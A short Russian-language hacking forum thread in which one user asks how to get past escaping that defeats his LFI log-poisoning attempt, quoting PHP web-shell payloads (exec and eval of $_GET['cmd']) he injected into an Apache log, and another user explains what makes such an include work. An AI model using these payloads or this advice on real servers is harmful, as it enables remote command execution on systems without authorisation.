LFI

Discussion in 'Уязвимости' started by karkajoi, 13 Feb 2018.

  1. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    151
    Likes Received:
    67
    Reputations:
    1
    Суть такова, записываю в лог файл который находится по /usr/local/apache/domlogs/site.com
    вот такой код
    <?php phpinfo();?>
    <?php exec(\$_GET['cmd']);?>
    <?php eval($_GET['cmd']);?>
    Но он не исполняется, в лог пишется вот так
    "\"<?php phpinfo();?>\""
    "//\"<?php exec(//\\$_GET['cmd']);?>//\""
    "\"<?php exec(\\$_GET['cmd']);?>\""
    Я так понимаю стоит какой-то фильтр.
    В какую сторону копать что б обойти его ?

    C LFI мало знаком, вот пытаюсь освоить техники
     
  2. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    350
    Likes Received:
    532
    Reputations:
    164
    Нужно уточнить, каким образом происходит инклуд. Код, если таковой имеется. Как данные попадают в лог файл. Хватает ли у процесса прав на чтение лога. Где происходит это действие и т.п.

    Судя по приведённым данным, phpinfo должен отрабатывать. Но нужно видеть весь лог файл, так как одним неверным запросом можно легко запороть лог, что будет приводить к ошибке синтаксиса для подключаемого PHP сценария. В этом случае, попробовать снова, можно будет только после ротации логов.

    Чтобы не затруднять себя сбором информации и ожиданием ответов в этой теме, советую ознакомиться с хорошей статьей и темой на рдтоте https://rdot.org/forum/showthread.php?t=343, за исключением нуллбайтовых техник в никсах, информация вполне актуальна на сегодняшний день.
     
    grimnir, Sensoft, ms13 and 1 other person like this.
  3. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    151
    Likes Received:
    67
    Reputations:
    1
    Спасибо за ответ, буду сейчас пробовать. Если что-то пойдет не так, сделаю более развернутый отсчет со скринами и т.д
     
    crlf likes this.